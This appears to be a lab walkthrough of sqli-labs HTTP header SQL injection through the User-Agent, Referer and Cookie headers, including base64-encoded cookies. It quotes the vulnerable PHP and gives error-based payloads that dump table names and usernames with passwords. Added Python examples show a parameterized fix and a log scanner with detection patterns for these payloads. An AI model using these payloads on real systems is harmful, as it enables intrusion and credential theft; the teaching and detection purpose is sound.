HTTP header injection
Use Burp to intercept the POST request, modify the header contents, and forward the request.
User-Agent injection
1. Normal login page:
2. Intercept the login request:
Change the User-Agent value to aaa and forward the request; the page output changes:
3. Error-based injection through a modified User-Agent:
Source code:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
Find the injection point:
1',1,1)#
Get the database name:
1',1,updatexml(1,concat(0x7e,(select database()),0x7e),1))#
Get the table names:
1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
Get the column names of the users table:
1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
Get the contents of the users table:
1',1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1))#
Get the remaining contents of the users table (the part cut off from the previous error message):
1',1,updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31),1))#
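The insert in the source code above builds the SQL text by splicing the User-Agent header straight into the statement, which is why a single quote in the header changes the statement rather than the stored value. The following is an added example, not code from sqli-labs or from this write-up: it reproduces that insert in Python with the unsafe concatenating form beside a parameterized form. It assumes Python's sqlite3 module as a stand-in for MySQL (so the `security` schema prefix is dropped and SQLite reports the page's probe `1',1,1)#` as a syntax error instead of treating `#` as a comment), and the `uagents` table is created inline. PHP offers the same parameter binding through PDO prepared statements or mysqli bind_param, which is the fix a practitioner would apply to the lab code.

```python
import sqlite3

# Constructed schema mirroring the page's `uagents` table (sqlite3 stands in for MySQL).
SCHEMA = "CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)"


def fresh_db():
    """Return an empty in-memory database with the uagents table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def log_agent_unsafe(conn, uagent, ip, uname):
    """Mirrors the page's PHP: the header value is spliced into the SQL text."""
    sql = (
        "INSERT INTO uagents (uagent, ip_address, username) "
        f"VALUES ('{uagent}', '{ip}', '{uname}')"
    )
    conn.execute(sql)  # a quote inside uagent rewrites the statement itself


def log_agent_safe(conn, uagent, ip, uname):
    """Hardened form: placeholders, so the driver sends values separately from the SQL text."""
    sql = "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)"
    conn.execute(sql, (uagent, ip, uname))


def stored_agents(conn):
    """Return every uagent value currently stored, in insertion order."""
    return [row[0] for row in conn.execute("SELECT uagent FROM uagents")]


def try_unsafe(uagent):
    """Run the concatenating insert; return ('ok', stored values) or ('error', message)."""
    conn = fresh_db()
    try:
        log_agent_unsafe(conn, uagent, "127.0.0.1", "admin")
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", stored_agents(conn))


def try_safe(uagent):
    """Run the parameterized insert; the header text is stored verbatim whatever it contains."""
    conn = fresh_db()
    log_agent_safe(conn, uagent, "127.0.0.1", "admin")
    return ("ok", stored_agents(conn))


if __name__ == "__main__":
    for value in ("aaa", "1',1,1)#"):  # the page's own benign value and probe
        print(repr(value), "unsafe ->", try_unsafe(value))
        print(repr(value), "safe   ->", try_safe(value))
```

With the benign value `aaa` both forms behave identically, which is why the bug is invisible in normal use; with the probe from the page, the concatenating form fails (or, on MySQL, executes a statement the developer never wrote), while the parameterized form simply stores the string `1',1,1)#` as a user agent.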
Referer injection
1. Normal login page:
2. Intercept the login request, change the Referer to aaa, and forward it; the page output changes:
3. Error-based injection through a modified Referer:
Source code:
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
Find the injection point:
1',1)#
Get the database name:
1',updatexml(1,concat(0x7e,(select database()),0x7e),1))#
Get the table names in the database:
1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
Get the column names of the users table:
1',updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
Get the contents of the users table:
1',updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1))#
Get the remaining contents of the users table (the part cut off from the previous error message):
1',updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31),1))#
Cookie injection
1. Normal login:
2. Intercept the GET request, change the Cookie to admin', and forward it; an error appears:
admin'
3. Error-based injection through a modified Cookie:
Source code:
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
Get the database name:
admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
Get the table names in this database:
admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) #
Get the column names of the users table:
admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) #
Get the contents of the users table:
admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) #
Get the remaining contents of the users table (the part cut off from the previous error message):
admin' and extractvalue(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31)) #
Base64-encoded Cookie injection:
1. Normal login page:
Notice that the uname cookie value is base64-encoded.
2. Base64-encode admin', intercept the GET request, replace the Cookie value, and forward it; an error appears:
3. Error-based injection through a modified Cookie:
Source code:
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
Injection point (plain text, then its base64 encoding as sent in the cookie):
admin') #
YWRtaW4nKSAj
Get the database name (plain text, then its base64 encoding as sent in the cookie):
admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw
The remaining steps are the same as in the previous section.
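A point the base64 section makes for defenders: a detector that only looks at raw header bytes never sees `extractvalue(` inside the cookie, because the value arrives encoded and is only decoded by the application. The following is an added example, not part of this write-up or of sqli-labs: it scans constructed access-log lines for the error-based markers that appear in the page's payloads (updatexml, extractvalue, information_schema, group_concat) in the Referer, User-Agent and Cookie fields, and additionally base64-decodes cookie values that look encoded before matching, restoring the padding the page's encoded strings omit. The log layout (referer, user agent and cookie quoted at the end of the line) is an assumed custom format, and the sample lines are constructed, reusing only payloads already shown on this page.

```python
import base64
import binascii
import re

# Error-based SQLi markers taken from the payloads on this page; matched case-insensitively.
MARKERS = re.compile(
    r"\b(updatexml|extractvalue)\s*\(|information_schema\.|group_concat\s*\(", re.I
)

# Assumed custom access-log layout: ... "request" status "referer" "user-agent" "cookie"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# Constructed sample lines: one benign login, the page's User-Agent payload,
# the page's base64-encoded cookie payload, and a benign plain-text cookie.
LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /Less-18/ HTTP/1.1" 200 '
    '"http://lab.local/Less-18/" "Mozilla/5.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "POST /Less-18/ HTTP/1.1" 200 '
    '"http://lab.local/Less-18/" "1\',1,updatexml(1,concat(0x7e,(select database()),0x7e),1))#" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /Less-22/ HTTP/1.1" 200 "-" "Mozilla/5.0" '
    '"uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw"',
    '10.0.0.5 - - [01/Jan/2024:10:01:02 +0000] "GET /Less-20/ HTTP/1.1" 200 "-" "Mozilla/5.0" '
    '"uname=admin"',
]


def maybe_b64_decode(value):
    """Decode value if it is base64 text (padding may be missing); return None otherwise."""
    stripped = value.strip()
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", stripped):
        return None
    padded = stripped + "=" * (-len(stripped) % 4)  # the page's samples omit '=' padding
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def header_views(name, raw):
    """Yield (label, text) pairs: the raw header, plus the decoded form of each base64 cookie value."""
    yield (name, raw)
    if name == "Cookie":
        for part in raw.split(";"):
            if "=" in part:
                cname, cval = part.split("=", 1)
                decoded = maybe_b64_decode(cval)
                if decoded is not None:
                    yield (f"Cookie[{cname.strip()}] (base64-decoded)", decoded)


def scan_line(line):
    """Return (client ip, header label, matched marker) for every marker found in one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []  # unparseable line; a real pipeline would count these separately
    hits = []
    headers = (("Referer", m["referer"]), ("User-Agent", m["ua"]), ("Cookie", m["cookie"]))
    for name, raw in headers:
        for label, text in header_views(name, raw):
            found = MARKERS.search(text)
            if found:
                hits.append((m["ip"], label, found.group(0)))
    return hits


def scan(lines):
    """Scan many log lines and flatten the findings."""
    return [hit for line in lines for hit in scan_line(line)]


if __name__ == "__main__":
    for hit in scan(LOG):
        print(hit)
```

Running it over the sample lines reports the User-Agent payload on the Less-18 request and the decoded cookie on the Less-22 request; the raw base64 string itself matches nothing, which is the gap the decoding step closes. Plain cookie values such as `admin` fail the strict decode and are left alone.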